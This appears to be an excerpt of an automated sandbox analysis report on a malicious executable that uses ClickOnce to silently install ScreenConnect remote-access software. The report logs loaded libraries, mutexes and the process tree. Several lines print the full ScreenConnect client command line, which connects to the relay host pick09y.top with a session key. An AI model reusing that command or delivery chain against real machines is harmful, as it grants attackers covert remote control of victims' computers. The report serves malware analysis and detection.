                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FF849235BB110_2_00007FF849235BB1
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FF849235DC410_2_00007FF849235DC4
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FF8492367F910_2_00007FF8492367F9
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeCode function: 14_2_00007FF848F410CF14_2_00007FF848F410CF
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeCode function: 14_2_00007FF848F410D714_2_00007FF848F410D7
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeCode function: 14_2_00007FF849259AC514_2_00007FF849259AC5
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeCode function: 14_2_00007FF84925E1A614_2_00007FF84925E1A6
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeCode function: 14_2_00007FF849255E2114_2_00007FF849255E21
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeCode function: 14_2_00007FF84925EF5214_2_00007FF84925EF52
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeCode function: 14_2_00007FF849256A6914_2_00007FF849256A69
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeCode function: 14_2_00007FF849256C6814_2_00007FF849256C68
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeCode function: 14_2_00007FF84925603414_2_00007FF849256034
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeCode function: 14_2_00007FF849260FD814_2_00007FF849260FD8
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 5856 -ip 5856
                  Source: pzPO97QouM.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, PopoutPanelTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ProgramTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, TaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                  Source: ScreenConnect.ClientService.dll.1.dr, WindowsLocalUserExtensions.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                  Source: classification engineClassification label: mal60.evad.winEXE@20/78@2/3
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeCode function: 0_2_00F51000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00F51000
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\DeploymentJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeMutant created: NULL
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeMutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5856
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\DeploymentJump to behavior
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeCommand line argument: dfshim0_2_00F51000
                  Source: pzPO97QouM.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\pzPO97QouM.exe "C:\Users\user\Desktop\pzPO97QouM.exe"
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=pick09y.top&p=8880&s=ff0619b3-cdda-4e74-9760-149d39b5b1c0&k=BgIAAACkAABSU0ExAAgAAAEAAQDdgAKam2Sc4a%2b0vjsNximnzOEX5MKRna0gdqvTZFUYhUi4mxfaIer02WcIARvbkQtcBocnZY6cOhwLXqtjbXCHK5V9NClpcJ0VsmVQ5Ngzm5KWTJOIRLp48Nx7xw8h5tMlI69ZhW7bDoTif1%2bzod8%2bP9ttRfgxJhBbSeiBlGI17JX%2ffgLdQYfBxWOvwJYUSFApm2B6yeRofjh%2b%2fClLGayEdlBZ3CJwK2rKMq6rxdojaIGyxzfrBIlRifETmHax7zLC%2fb3uiIEpoX2rWmOZFQlj%2bubOBd89yKN0uBh3aLVd%2b8orlqSpyEBCOK4rG%2fOuOyVEiCOkqxdA0LWuzW70luvi&r=&i=Untitled%20Session" "1"
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=pick09y.top&p=8880&s=ff0619b3-cdda-4e74-9760-149d39b5b1c0&k=BgIAAACkAABSU0ExAAgAAAEAAQDdgAKam2Sc4a%2b0vjsNximnzOEX5MKRna0gdqvTZFUYhUi4mxfaIer02WcIARvbkQtcBocnZY6cOhwLXqtjbXCHK5V9NClpcJ0VsmVQ5Ngzm5KWTJOIRLp48Nx7xw8h5tMlI69ZhW7bDoTif1%2bzod8%2bP9ttRfgxJhBbSeiBlGI17JX%2ffgLdQYfBxWOvwJYUSFApm2B6yeRofjh%2b%2fClLGayEdlBZ3CJwK2rKMq6rxdojaIGyxzfrBIlRifETmHax7zLC%2fb3uiIEpoX2rWmOZFQlj%2bubOBd89yKN0uBh3aLVd%2b8orlqSpyEBCOK4rG%2fOuOyVEiCOkqxdA0LWuzW70luvi&r=&i=Untitled%20Session" "1"
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe" "RunRole" "7c199985-91b6-43e6-a992-7121e466b299" "User"
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 5856 -ip 5856
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5856 -s 316
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe" "RunRole" "7595e846-2dc4-4314-8d6a-fc819222a16f" "System"
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=pick09y.top&p=8880&s=ff0619b3-cdda-4e74-9760-149d39b5b1c0&k=BgIAAACkAABSU0ExAAgAAAEAAQDdgAKam2Sc4a%2b0vjsNximnzOEX5MKRna0gdqvTZFUYhUi4mxfaIer02WcIARvbkQtcBocnZY6cOhwLXqtjbXCHK5V9NClpcJ0VsmVQ5Ngzm5KWTJOIRLp48Nx7xw8h5tMlI69ZhW7bDoTif1%2bzod8%2bP9ttRfgxJhBbSeiBlGI17JX%2ffgLdQYfBxWOvwJYUSFApm2B6yeRofjh%2b%2fClLGayEdlBZ3CJwK2rKMq6rxdojaIGyxzfrBIlRifETmHax7zLC%2fb3uiIEpoX2rWmOZFQlj%2bubOBd89yKN0uBh3aLVd%2b8orlqSpyEBCOK4rG%2fOuOyVEiCOkqxdA0LWuzW70luvi&r=&i=Untitled%20Session" "1"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe" "RunRole" "7c199985-91b6-43e6-a992-7121e466b299" "User"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe" "RunRole" "7595e846-2dc4-4314-8d6a-fc819222a16f" "System"Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 5856 -ip 5856
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5856 -s 316
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeSection loaded: dfshim.dllJump to behavior
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dfshim.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cryptnet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cabinet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: uiautomationcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
